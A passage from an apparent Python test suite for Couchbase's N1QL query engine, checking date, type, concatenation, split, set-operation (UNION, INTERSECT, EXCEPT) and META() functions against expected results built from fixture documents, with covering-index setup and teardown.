expected_result = [{"name": doc['name'], "join_yr": doc['join_yr'],
"join_mo": doc['join_mo'], "join_day": doc['join_day']}
for doc in self.full_list
if doc['join_yr'] < today.year and
doc['join_mo'] > today.month and
doc['join_day'] > today.day]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
self._verify_results(actual_result, expected_result)
def test_prepared_date_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select name, join_yr, join_mo, join_day from %s' % query_bucket + \
' where date_part_str(now_str(),"month") < join_mo AND date_part_str(now_str(),"year")' + \
' > join_yr AND date_part_str(now_str(),"day") < join_day'
self.prepared_common_body()
def test_now_millis(self):
self.query = "select now_millis() as now"
now = time.time()
res = self.run_cbq_query()
self.assertFalse("error" in str(res).lower())
def test_str_to_millis(self):
now_millis = time.time()
now_time = datetime.datetime.fromtimestamp(now_millis)
now_millis = now_millis * 1000
try:
now_time_zone = round(
(round((datetime.datetime.now() - datetime.datetime.utcnow()).total_seconds()) // 1800) // 2)
except AttributeError as ex:
raise Exception("Test requires python 2.7 : SKIPPING TEST")
now_time_str = "%s-%02d-%02d" % (now_time.year, now_time.month, now_time.day)
self.query = "select str_to_millis('%s') as now" % now_time_str
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] < now_millis and
(res["results"][0]["now"] > (now_millis - 5184000000)),
"Result expected to be in: [%s ... %s]. Actual %s" % (
now_millis - 5184000000, now_millis, res["results"]))
def test_millis_to_str(self):
now_millis = time.time()
now_time = datetime.datetime.utcfromtimestamp(now_millis)
expected = "%s-%02d-%02dT%02d:%02d" % (now_time.year, now_time.month, now_time.day,
now_time.hour, now_time.minute)
self.query = "select millis_to_utc(%s) as now" % (now_millis * 1000)
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"].startswith(expected),
"Result expected: %s. Actual %s" % (expected, res["results"]))
def test_date_part_millis(self):
now_millis = time.time()
now_time = datetime.datetime.utcfromtimestamp(now_millis)
now_millis = now_millis * 1000
self.query = 'select date_part_millis(%s, "hour", "UTC") as hour, ' % now_millis + \
'date_part_millis(%s,"minute", "UTC") as minute, date_part_millis(' % now_millis + \
'%s,"second") as sec, date_part_millis(%s,"millisecond", "UTC") as msec' % (now_millis, now_millis)
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["hour"] == now_time.hour,
"Result expected: %s. Actual %s" % (now_time.hour, res["results"]))
self.assertTrue(res["results"][0]["minute"] == now_time.minute,
"Result expected: %s. Actual %s" % (now_time.minute, res["results"]))
self.assertTrue(res["results"][0]["sec"] == now_time.second,
"Result expected: %s. Actual %s" % (now_time.second, res["results"]))
self.assertTrue("msec" in res["results"][0], "There are no msec in results")
def test_where_millis(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select join_yr, join_mo, join_day, name from %s" % query_bucket + \
" where join_mo < 10 and join_day < 10 and str_to_millis(tostr(join_yr) || '-0'" + \
" || tostr(join_mo) || '-0' || tostr(join_day)) < now_millis()"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result["results"], key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
expected_result = [{"name": doc['name'], "join_yr": doc['join_yr'],
"join_mo": doc['join_mo'], "join_day": doc['join_day']}
for doc in self.full_list
if doc['join_mo'] < 10 and doc['join_day'] < 10]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
self._verify_results(actual_result, expected_result)
def test_order_by_dates(self):
self.fail_if_no_buckets()
orders = ["asc", "desc"]
for order in orders:
for query_bucket in self.query_buckets:
self.query = "select millis_to_str(str_to_millis('2010-01-01')) as date"
actual_result = self.run_cbq_query()
self.assertTrue(actual_result["results"][0]["date"][:10] == '2010-01-01',
'Actual result %s' % actual_result)
self.query = "select join_yr, join_mo, join_day," \
" millis_to_str(str_to_millis(tostr(join_yr) || '-0' ||" + \
" tostr(join_mo) || '-0' || tostr(join_day))) as date from %s" % query_bucket + \
" where join_mo < 10 and join_day < 10 ORDER BY date %s" % order
actual_result = self.run_cbq_query()
actual_result = ([{"date": doc["date"][:10],
"join_yr": doc['join_yr'],
"join_mo": doc['join_mo'],
"join_day": doc['join_day']} for doc in actual_result["results"]])
expected_result = [{"date": '%s-0%s-0%s' % (doc['join_yr'],
doc['join_mo'], doc['join_day']),
"join_yr": doc['join_yr'],
"join_mo": doc['join_mo'],
"join_day": doc['join_day']}
for doc in self.full_list
if doc['join_mo'] < 10 and doc['join_day'] < 10]
expected_result = sorted(expected_result, key=lambda doc: (doc['date']), reverse=(order == 'desc'))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# TYPE FNS
##############################################################################################
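    # The type-function tests below pair document expressions with the TYPENAME()/IS*() result
    # expected for every document in the bucket.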
def test_type(self):
self.fail_if_no_buckets()
types_list = [("name", "string"), ("tasks_points", "object"),
("some_wrong_key", "missing"),
("skills", "array"), ("VMs[0].RAM", "number"),
("true", "boolean"), ("test_rate", "number"),
("test.test[0]", "missing")]
for query_bucket in self.query_buckets:
for name_item, type_item in types_list:
self.query = 'SELECT TYPENAME(%s) as type_output FROM %s' % (
name_item, query_bucket)
actual_result = self.run_cbq_query()
for doc in actual_result['results']:
self.assertTrue(doc["type_output"] == type_item,
"Expected type for %s: %s. Actual: %s" % (
name_item, type_item, doc["type_output"]))
self.log.info("Type for %s(%s) is checked." % (name_item, type_item))
def test_check_types(self):
self.fail_if_no_buckets()
types_list = [("name", "ISSTR", True), ("skills[0]", "ISSTR", True),
("test_rate", "ISSTR", False), ("VMs", "ISSTR", False),
("false", "ISBOOL", True), ("join_day", "ISBOOL", False),
("VMs", "ISARRAY", True), ("VMs[0]", "ISARRAY", False),
("skills[0]", "ISARRAY", False), ("skills", "ISARRAY", True)]
for query_bucket in self.query_buckets:
for name_item, fn, expected_result in types_list:
self.query = 'SELECT %s(%s) as type_output FROM %s' % (
fn, name_item, query_bucket)
actual_result = self.run_cbq_query()
for doc in actual_result['results']:
self.assertTrue(doc["type_output"] == expected_result,
"Expected output for fn %s( %s) : %s. Actual: %s" % (
fn, name_item, expected_result, doc["type_output"]))
self.log.info("Fn %s(%s) is checked. (%s)" % (fn, name_item, expected_result))
def test_types_in_satisfy(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES ISOBJ(vm) END) AND" + \
" ISSTR(email) ORDER BY name"
if self.analytics:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES ISOBJ(vm) ) AND" + \
" ISSTR(email) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_to_num(self):
self.query = 'SELECT tonum("12.12") - tonum("0.12") as num'
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'][0]['num'] == 12,
"Expected: 12. Actual: %s" % (actual_result['results']))
self.log.info("TONUM is checked")
def test_to_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT TOSTR(join_mo) month FROM %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
self.query = "SELECT REVERSE(TOSTR(join_mo)) rev_month FROM %s" % query_bucket
actual_result1 = self.run_cbq_query()
actual_result2 = actual_result1['results']
expected_result = [{"month": str(doc['join_mo'])} for doc in self.full_list]
expected_result2 = [{"rev_month": str(doc['join_mo'])[::-1]} for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result2, expected_result2)
def test_to_bool(self):
self.query = 'SELECT tobool("true") as boo'
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'][0]['boo'],
"Expected: true. Actual: %s" % (actual_result['results']))
self.log.info("TOBOOL is checked")
# Test has no usages anywhere
def test_to_array(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, toarray(name) as names" + \
" FROM %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = sorted(actual_list['results'], key=lambda doc: (doc['job_title'],
doc['names']))
expected_result = [{"job_title": doc["job_title"],
"names": [doc["name"]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title'],
doc['names']))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# CONCATENATION
##############################################################################################
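    # '||' is the N1QL string concatenation operator; expected values are rebuilt in Python with '+'.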
def test_concatenation(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name || \" \" || job_title as employee" + \
" FROM %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = sorted(actual_list['results'], key=lambda doc: (doc['employee']))
expected_result = [{"employee": doc["name"] + " " + doc["job_title"]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['employee']))
self._verify_results(actual_result, expected_result)
def test_concatenation_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name, skills' + \
' FROM %s WHERE skills[0]=("skill" || "2010")' % query_bucket
actual_list = self.run_cbq_query()
self.query = 'SELECT name, skills' + \
' FROM %s WHERE reverse(skills[0])=("0102" || "lliks")' % query_bucket
actual_list1 = self.run_cbq_query()
actual_result = actual_list['results']
actual_result2 = actual_list1['results']
expected_result = [{"name": doc["name"], "skills": doc["skills"]}
for doc in self.full_list
if doc["skills"][0] == 'skill2010']
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result, actual_result2)
##############################################################################################
#
# SPLIT
##############################################################################################
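    # SPLIT(expr, sep) returns an array of substrings, so [0] selects the first token; the expected
    # values mirror this with Python's str.split().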
def test_select_split_fn(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT SPLIT(email, '@')[0] as login" + \
" FROM %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"login": doc["email"].split('@')[0]}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_split_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s' % query_bucket + \
' WHERE SPLIT(email, \'-\')[0] = SPLIT(name, \'-\')[1]'
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list
if doc["email"].split('-')[0] == doc["name"].split('-')[1]]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# UNION
##############################################################################################
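    # UNION removes duplicate rows, so expected results are reduced to distinct dicts via
    # set(tuple(x.items())); UNION ALL (tested further below) keeps duplicates.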
def test_union(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name from %s union select email from %s" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_prepared_union(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name from %s union select email from %s" % (query_bucket, query_bucket)
self.prepared_common_body()
def test_union_multiply_buckets(self):
self.assertTrue(len(self.buckets) > 1, 'This test needs more than one bucket')
self.query = "select name from %s union select email from %s" % (self.buckets[0].name, self.buckets[1].name)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_union_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name from %s union all select email from %s" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
self._verify_results(actual_result, expected_result)
def test_union_all_multiply_buckets(self):
self.assertTrue(len(self.buckets) > 1, 'This test needs more than one bucket')
self.query = "select name from %s union all select email from %s" % (self.query_buckets[0],
self.query_buckets[1])
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
self._verify_results(actual_result, expected_result)
def test_union_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s union select email from %s where join_mo > 2" % (query_bucket,
query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list if doc["join_mo"] > 2])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_union_where_covering(self):
created_indexes = []
ind_list = ["one", "two"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "coveringindex{0}".format(ind)
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(name, email, join_mo) USING {2}".format(index_name, query_bucket,
self.index_type)
elif ind == "two":
self.query = "CREATE INDEX {0} ON {1}(email, join_mo) USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket in self.query_buckets:
self.query = "explain select name from {0} where name is not null union select email from {0} where email " \
"is not null and join_mo >2 ".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select name from {0} where name is not null union select email from {0} where email is not " \
"null and join_mo >2".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]} for doc in self.full_list]
expected_result.extend([{"email": doc["email"]} for doc in self.full_list if doc["join_mo"] > 2])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
for index_name in created_indexes:
try:
self.query = "DROP INDEX {0} ON {1} USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
except Exception as e:
self.log.error("Drop index failed {0}".format(str(e)))
self.query = "CREATE PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
self.sleep(15, 'wait for index')
self.query = "select name from {0} where name is not null union select email from {0} where email is not " \
"null and join_mo >2".format(query_bucket)
result = self.run_cbq_query()
diffs = DeepDiff(actual_result, result['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
def test_union_aggr_fns(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select count(name) as names from %s union select count(email) as " \
"emails from %s" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"names": len(self.full_list)}]
expected_result.extend([{"emails": len(self.full_list)}])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_union_aggr_fns_covering(self):
created_indexes = []
ind_list = ["one", "two"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "coveringindex%s" % ind
if ind == "one":
self.query = "CREATE INDEX %s ON %s(name, email, join_day) USING %s" % (index_name,
query_bucket,
self.index_type)
elif ind == "two":
self.query = "CREATE INDEX %s ON %s(email) USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket in self.query_buckets:
self.query = "explain select count(name) as names from %s where join_day is not null union select count(" \
"email) as emails from %s where email is not null" % (query_bucket, query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name)
self.query = "select count(name) as names from %s where join_day is not null union select count(email) " \
" as emails from %s where email is not null" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"names": len(self.full_list)}]
expected_result.extend([{"emails": len(self.full_list)}])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self.sleep(15, 'wait for index')
self.query = "select count(name) as names from %s where join_day is not null union select count(email) " \
" as emails from %s where email is not null" % (
query_bucket, query_bucket)
result = self.run_cbq_query()
            diffs = DeepDiff(actual_result, result['results'], ignore_order=True)
            if diffs:
                self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
# ############# META NEW ###################
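    # Most META tests follow the same pattern: create a secondary index on meta() fields, run the
    # query (optionally checking the covering plan), then drop the index, re-run against the primary
    # index and compare both result sets with DeepDiff.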
def test_meta_basic(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "metaindex%s" % ind
if ind == "one":
self.query = "CREATE INDEX %s ON %s(meta().id,meta().cas) USING %s" % (
index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, meta().cas from {0} where meta().id is not null order by meta(" \
").id limit 10".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, meta().cas from {0} where meta().id is not null order by " \
"meta().id limit 10".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, meta().cas from {0} use index(`#primary`) where meta().id is not null " \
"order by meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_where(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "meta_where%s" % ind
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(meta().id,meta().cas) where meta().id like " \
"'query-testemployee6%' USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, meta().cas from {0} where meta().id like 'query-testemployee6%' " \
"order by meta().id limit 10".format(
query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, meta().cas from {0} where meta().id like 'query-testemployee6%' order by " \
"meta().id limit 10".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, meta().cas from {0} where meta().id like 'query-testemployee6%' order by " \
"meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_ambiguity(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "create index idx on %s(META())" % query_bucket
self.run_cbq_query()
self.query = "create index idx2 on {0}(META())".format(query_bucket)
self.run_cbq_query()
self.query = "SELECT META() as meta_c FROM %s ORDER BY meta_c limit 10" % query_bucket
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['status'] == "success")
self.query = "SELECT META(test) as meta_c FROM %s as test ORDER BY meta_c limit 10" % query_bucket
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['status'] == "success")
self.query = "SELECT META(t1).id as id FROM " + self.query_buckets[0] + " t1 JOIN " + \
self.query_buckets[0] + " t2 ON KEYS t1.id;"
self.assertTrue(actual_result['status'] == "success")
self.query = "drop index idx ON %s" % query_bucket
self.run_cbq_query()
self.query = "drop index idx2 ON %s" % query_bucket
self.run_cbq_query()
def test_meta_where_greater_than(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "meta_where%s" % ind
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(meta().id,meta().cas) where meta().id >10 USING {2}".format(
index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, meta().cas from {0} where meta().id >10 order by meta().id".format(
query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, meta().cas from {0} where meta().id >10 order by meta().id limit 10".format(
query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, meta().cas from {0} use index(`#primary`) where meta().id > 10 order by " \
"meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_partial(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "meta_where%s" % ind
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(meta().id, name) where meta().id >10 USING {2}".format(
index_name, query_bucket, self.index_type)
# if self.gsi_type:
# self.query += "WITH {'index_type': 'memdb'}"
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, name from {0} where meta().id >10 and name is not null order by " \
"meta().id limit 10".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, name from {0} where meta().id >10 and name is not null order by " \
"meta().id limit 10".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, name from {0} use index(`#primary`) where meta().id > 10 and name is not " \
"null order by meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_non_supported(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
for ind in ind_list:
index_name = "meta_cas_%s" % ind
if ind == "one":
queries_errors = {'CREATE INDEX ONE ON ' + self.query_buckets[0] + ' (meta().cas) using GSI': (
'syntax error', 3000),
'CREATE INDEX ONE ON ' + self.query_buckets[0] + ' (meta().flags) using GSI': (
'syntax error', 3000),
'CREATE INDEX ONE ON ' + self.query_buckets[
0] + ' (meta().expiration) using GSI': (
'syntax error', 3000),
'CREATE INDEX ONE ON ' + self.query_buckets[0] + ' (meta().cas) using VIEW': (
                                          'syntax error', 3000)}
                    self.negative_common_body(queries_errors)
def test_meta_negative_namespace(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
for ind in ind_list:
index_name = "meta_cas_%s" % ind
if ind == "one":
queries_errors = {
'CREATE INDEX TWO ON ' + self.query_buckets[0] + ' (meta(invalid).id) using GSI': (
'syntax error', 3000),
'CREATE INDEX THREE ON ' + self.query_buckets[0] + ' (meta(invalid).id) using VIEW': (
'syntax error', 3000),
'CREATE INDEX FOUR ON ' + self.query_buckets[0] + ' (meta()) using GSI': ('syntax error', 3000),
'CREATE INDEX FIVE ON ' + self.query_buckets[0] + ' (meta()) using VIEW': (
'syntax error', 3000)}
self.negative_common_body(queries_errors)
# ####################### META NEW END ######################################
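    # INTERSECT/EXCEPT follow the same distinct vs. ALL semantics as UNION: the plain forms
    # de-duplicate, the ALL variants keep duplicates.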
def test_intersect(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s intersect select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if doc['join_day'] > 5]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_intersect_covering(self):
created_indexes = []
ind_list = ["one", "two"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "coveringindex{0}".format(ind)
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(job_title, name) USING {2}".format(index_name, query_bucket, self.index_type)
elif ind == "two":
self.query = "CREATE INDEX {0} ON {1}(join_day, name) USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select name from {0} where job_title='Engineer' intersect select name from {0} s where s.join_day>5".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name)
self.query = "select name from {0} where job_title='Engineer' intersect select name from {0} s where s.join_day>5".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if doc['join_day'] > 5]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
for ind in ind_list:
index_name = "coveringindex{0}".format(ind)
try:
self.query = "DROP INDEX {0} ON {1} USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
except Exception as e:
self.log.error("Drop index failed {0}".format(str(e)))
self.query = "CREATE PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select name from {0} where job_title='Engineer' intersect select name from {0} s where s.join_day>5".format(query_bucket, query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
def test_intersect_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s intersect all select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if doc['join_day'] > 5]
self._verify_results(actual_result, expected_result)
def test_prepared_intersect(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s intersect all select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
self.prepared_common_body()
def test_except_secondsetempty(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "drop primary index on %s USING %s" % (query_bucket, self.primary_indx_type)
self.run_cbq_query()
try:
self.query = "(select id keyspace_id from system:keyspaces) except (select indexes.keyspace_id from " \
"system:indexes) "
actual_list = self.run_cbq_query()
bucket_names = []
for bucket in self.buckets:
bucket_names.append(bucket.name)
count = 0
for _ in self.query_buckets:
if actual_list['results'][count]['keyspace_id'] in bucket_names:
count += 1
else:
self.log.error("Wrong keyspace id returned or empty keyspace id returned")
finally:
for query_bucket in self.query_buckets:
self.query = "create primary index on %s" % query_bucket
self.run_cbq_query()
def test_except(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s except select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if not doc['join_day'] > 5]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_except_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s except all select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if not doc['join_day'] > 5]
